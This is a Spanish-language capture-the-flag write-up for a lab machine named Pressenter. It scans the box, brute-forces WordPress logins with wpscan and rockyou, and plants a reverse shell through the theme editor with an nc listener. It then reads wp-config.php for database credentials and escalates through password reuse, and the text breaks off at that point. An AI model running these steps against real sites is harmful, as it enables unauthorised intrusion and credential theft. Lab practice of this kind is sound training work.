# Pressenter
### 馃攳 RECONOCIMIENTO
En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando:
```bash
ping -c 1 172.17.0.2
```
para verificar la conectividad de red.
A continuaci贸n, realizamos el comando:
```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```
para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP.
Como podemos observar durante el escaneo que el **puerto 80** perteneciente al **servicio HTTP** est谩 abierto por lo que a continuaci贸n se indagar谩 m谩s.
### 馃攷 EXPLORACI脫N
Se utiliza el comando:
```bash
sudo nmap -sCV -p80 -v 172.17.0.2
```
para que nos proporcione m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web de CTF (est谩 algo fea) puede ser que sea un WordPress.
Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a trav茅s de:
```bash
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,php,txt,xml
```
Revisamos el c贸digo fuente y encontramos un dominio por lo que hay que a帽adirlo en el archivo `/etc/hosts`.
Al ser un **WordPress** realizamos este comando para enumerar los usuarios y plugins.
```bash
wpscan --url http://pressenter.hl/ --enumerate u,vp
```
Realizamos fuerza bruta a trav茅s de la misma herramienta.
```bash
wpscan --url http://pressenter.hl/ --passwords /usr/share/wordlists/rockyou.txt --usernames pressi,hacker
```
Nos logueamos con esas credenciales.
### 馃殌 **EXPLOTACI脫N**
Estamos dentro vamos a la secci贸n de **Herramientas** en concreto **Editor de archivos de temas** para subir la [**Reverse Shell**](https://www.revshells.com/).
Al actualizar el archivo nos ponemos en escucha.
```bash
nc -lvnp 443
```
Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar m谩s c贸modos.
### 馃攼 **PRIVILEGIOS**
Al estar dentro y ejecutar:
```bash
whoami
```
a煤n no somos **root**, por lo que hacemos:
```bash
sudo -l
```
para ver si hay algo para explotar. No tenemos permisos SUDO.
Encuentro en el directorio `/tmp` un archivo que no se puede leer si no soy el usuario **mysql** por lo que voy a mostrar el contenido de **wp-config.php**.
```
cat /var/www/pressenter/wp-config.php
```
Encontramos un usuario y su contrase帽a.
```
mysql -u admin -p'rooteable' -h 127.0.0.1
```
Indagamos a ver si encontramos informaci贸n relevante.
```bash
show databases;
use wordpress;
show tables;
select * from wp_usernames;
```
Encontramos las credenciales del usuario **enter**. Nos logueamos.
En el directorio del usuario hay una flag probablemente en el directorio root puede haber algo parecido por lo que realizamos este comando para escalar privilegios.
```bash
sudo /usr/bin/cat /root/root.txt
```
No tenemos suerte, voy a probar una soluci贸n m谩s sencilla y es la misma contrase帽a sea para root.
